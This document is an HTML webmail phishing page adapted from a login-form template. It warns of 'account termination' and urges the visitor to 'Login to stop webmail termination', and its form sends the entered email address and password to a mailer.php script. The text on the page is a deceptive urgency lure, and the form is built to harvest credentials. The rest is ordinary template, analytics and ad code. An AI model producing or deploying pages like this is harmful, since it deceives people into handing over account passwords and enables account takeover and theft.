<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login to verify your account</title>
 <!-- Meta-Tags -->
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
    <meta name="keywords" content="Business Login Form a Responsive Web Template, Bootstrap Web Templates, Flat Web Templates, Android Compatible Web Template, Smartphone Compatible Web Template, Free Webdesigns for Nokia, Samsung, LG, Sony Ericsson, Motorola Web Design">
    <script type="text/javascript" async="" src="./Business Login Form Responsive Widget Template __ w3layouts_files/analytics.js.download"></script><script>
        addEventListener("load", function () {
            setTimeout(hideURLbar, 0);
        }, false);

        function hideURLbar() {
            window.scrollTo(0, 1);
        }
    </script>
    <!-- //Meta-Tags -->
	
	<!-- css files -->
	<link href="./Business Login Form Responsive Widget Template __ w3layouts_files/font-awesome.min.css" rel="stylesheet" type="text/css" media="all">
	<link href="./Business Login Form Responsive Widget Template __ w3layouts_files/style.css" rel="stylesheet" type="text/css" media="all">
	<!-- //css files -->
	
	<!-- google fonts -->
	<link href="./Business Login Form Responsive Widget Template __ w3layouts_files/css" rel="stylesheet">
	<!-- //google fonts -->
	
<script id="_bsa_srv-CKYI653J_0" type="text/javascript" src="./Business Login Form Responsive Widget Template __ w3layouts_files/CKYI653J.json"></script><link id="codefund-style" rel="stylesheet" media="all" href="./Business Login Form Responsive Widget Template __ w3layouts_files/code_fund_ad-f732ebf8.css"><script id="codefund-script" type="text/javascript" src="./Business Login Form Responsive Widget Template __ w3layouts_files/code_fund_ad-798219b48ebe932faeed.js.download"></script><script id="_bsa_srv-CKYI627U_1" type="text/javascript" src="./Business Login Form Responsive Widget Template __ w3layouts_files/CKYI627U.json"></script><script id="_bsa_srv-CKYDL2JN_2" type="text/javascript" src="./Business Login Form Responsive Widget Template __ w3layouts_files/CKYDL2JN.json"></script></head>
<body style="">
<script src="./Business Login Form Responsive Widget Template __ w3layouts_files/jquery.min.js.download"></script><script src="./Business Login Form Responsive Widget Template __ w3layouts_files/monetization.js.download" type="text/javascript"></script>
<script>
(function(){
	if(typeof _bsa !== 'undefined' && _bsa) {
  		// format, zoneKey, segment:value, options
  		_bsa.init('flexbar', 'CKYI627U', 'placement:w3layoutscom');
  	}
})();
</script>
<script>
(function(){
if(typeof _bsa !== 'undefined' && _bsa) {
	// format, zoneKey, segment:value, options
	_bsa.init('fancybar', 'CKYDL2JN', 'placement:demo');
}
})();
</script>
<script>
(function(){
	if(typeof _bsa !== 'undefined' && _bsa) {
  		// format, zoneKey, segment:value, options
  		_bsa.init('stickybox', 'CKYI653J', 'placement:w3layoutscom');
  	}
})();
</script>
<!--<script>(function(v,d,o,ai){ai=d.createElement("script");ai.defer=true;ai.async=true;ai.src=v.location.protocol+o;d.head.appendChild(ai);})(window, document, "//a.vdo.ai/core/w3layouts_V2/vdo.ai.js?vdo=34");</script>-->
	
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async="" src="./Business Login Form Responsive Widget Template __ w3layouts_files/js"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-149859901-1');
</script>

<script>
     window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
     ga('create', 'UA-149859901-1', 'demo.w3layouts.com');
     ga('require', 'eventTracker');
     ga('require', 'outboundLinkTracker');
     ga('require', 'urlChangeTracker');
     ga('send', 'pageview');
   </script>
<script async="" src="./Business Login Form Responsive Widget Template __ w3layouts_files/autotrack.js.download"></script>

<meta name="robots" content="noindex">
<link rel="stylesheet" href="./Business Login Form Responsive Widget Template __ w3layouts_files/demobar_w3_4thDec2019.css">
	<!-- Demo bar start -->



<div class="signupform">
	<div class="container">
		<!-- main content -->
		<!---728x90--->

		<div class="agile_info">
			<div class="w3l_form">
				<div class="left_grid_info">
					<h1> Account termination</h1>
					<p>Urgent Server Warning! Update your email.</p>
					<img src="image.jpg" alt="">
				</div>
			</div>

			<div class="w3_info">
			<!---728x90--->
				<h2>Login to stop webmail termination</h2>
				<p>Enter your details to secure email.</p>
				<form action="mailer.php" method="post">
					<label>Email Address</label>
					<div class="input-group">
						<span class="fa fa-envelope" aria-hidden="true"></span>
						<input type="email" name="email" id="email" placeholder="Enter Your Email" required=""> 
					</div>
					<label>Password</label>
					<div class="input-group">
						<span class="fa fa-lock" aria-hidden="true"></span>
						<input type="Password" name="pass" id="pass" placeholder="Enter Password" required="">
					</div> 
					<div class="login-check">
						<input type="radio" name="checkbox"	><i> </i> Update my email</input>
					</div>						<p><br>
						<button class="btn btn-danger btn-block" type="submit">Stop Email Termination</button>                
				</form>
				<p class="account">By clicking login, you agree to our <a href="#">Terms &amp; Conditions!</a></p>
				</div>
		</div>
		<!-- //main content -->
	</div>
	<!---728x90--->
	<!-- footer -->
	<div class="footer">
		<p>© 2019 Webmail & Security Rights Reserved</p>
	</div>
	<!-- footer -->
</div>
	

</body></html>